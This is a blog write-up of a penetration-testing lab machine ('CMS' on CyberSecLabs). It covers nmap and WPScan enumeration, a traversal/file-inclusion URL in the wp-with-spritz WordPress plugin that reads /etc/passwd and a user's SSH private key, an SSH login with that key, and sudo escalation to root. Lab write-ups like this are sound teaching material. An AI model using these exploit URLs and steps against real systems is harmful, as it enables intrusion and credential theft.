Open in app

Sign in

Write

Sign in

CyberSecLabs-CMS

Software Sinner
3 min readJul 3, 2020

--

This is my fourth write up and I will be discussing my experience with the machine “CMS” from CyberSecLabs. CyberSecLabs is a great platform, for people who are starting out with penetration testing. Shares was a fairly simple Linux box. A WordPress plugin wp-with-spritz was found vulnerable leading to a Remote File Inclusion(RFI).

Step 1: Enumeration

Started off with an Nmap scan and jumped right in. My first scan used default scripts -sC and version detection -sV. The second scan pretty much gave me similar results.

sudo nmap -sC -sV 172.31.1.8

The WordPress version 5.3.2 stuck out like a soar thumb to me. I ran WPScan against the IP and went down the list trying each outdated plugin with exploits until I reached wp-with-spritz.

sudo wpscan -- url http://172.31.1.8/

Step 2: Exploitation

I googled the plugin wp-with-spritz along with the word exploit and discovered this sucker.

Offensive Security's Exploit Database Archive

Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion # Date: 2018-04-25 # Exploit Author: Wadeek…

www.exploit-db.com

The exploit shows that an Remote File Inclusion(RFI) is possible so I appended the exploit path to the URL and passwd puked out all user info.

http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

Now that we know this exploit works I attempted throwing a reverse shell onto the system and had no luck. I cant stress how important it is to look around the main sites webpage for clues. I found a blog tab and it ended up giving me info on where the user angel stores his ssh private key.

Really dude?

I appended the path to the Remote File Inclusion(RFI) and obtained the ssh private key.

http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//home/angel/.ssh/id_rsa

I took the key and copied it into a text file and attempted to convert it with ssh2john and it detected that it was not password protected. I then connected to the host directly.

sudo chmod 600 angelkey.txtsudo ssh -i angelkey.txt angel@172.31.1.8

Step 3: Post Exploitation

First thing I do when I get access to the box aside of grabbing the user flag is run a couple of commands to see if privileges can be escalated:

sudo -lsudo -i

We see that all commands can be ran with no restrictions. So I escalated to root easily.

Owned…

Cybersecurity
WordPress
Hacking
Nmap
Information Security

--

--

Software Sinner
Software Sinner

Written by Software Sinner

138 Followers
1 Following

Penetration Tester 🦇 | https://github.com/SoftwareSinner

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams